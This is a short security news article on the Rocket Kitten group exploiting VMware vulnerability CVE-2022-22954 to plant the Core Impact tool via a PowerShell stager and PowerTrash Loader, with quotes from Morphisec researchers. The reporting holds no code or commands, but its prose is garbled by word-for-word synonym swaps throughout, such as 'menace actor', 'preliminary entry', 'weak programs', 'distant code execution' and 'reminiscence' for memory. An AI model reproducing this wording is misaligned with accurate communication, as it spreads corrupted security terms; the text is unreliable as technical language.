An Iranian-linked menace actor generally known as Rocket Kitten has been noticed actively exploiting a lately patched VMware vulnerability to achieve preliminary entry and deploy the Core Impact penetration testing instrument on weak programs.
Tracked as CVE-2022-22954 (CVSS rating: 9.8), the important difficulty considerations a case of distant code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager.
While the difficulty was patched by the virtualization providers supplier on April 6, 2022, the corporate cautioned customers of confirmed exploitation of the flaw occurring within the wild per week later.
“A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface,” researchers from Morphisec Labs mentioned in a brand new report. “This means highest privileged access into any components of the virtualized host and guest environment.”
Attack chains exploiting the flaw contain the distribution of a PowerShell-based stager, which is then used to obtain a next-stage payload referred to as PowerTrash Loader that, in flip, injects the penetration testing instrument, Core Impact, into reminiscence for follow-on actions.
“The widespread use of VMWare identity access management combined with the unfettered remote access this attack provides is a recipe for devastating breaches across industries,” the researchers mentioned.
“VMWare customers should also review their VMware architecture to ensure the affected components are not accidentally published on the internet, which dramatically increases the exploitation risks.”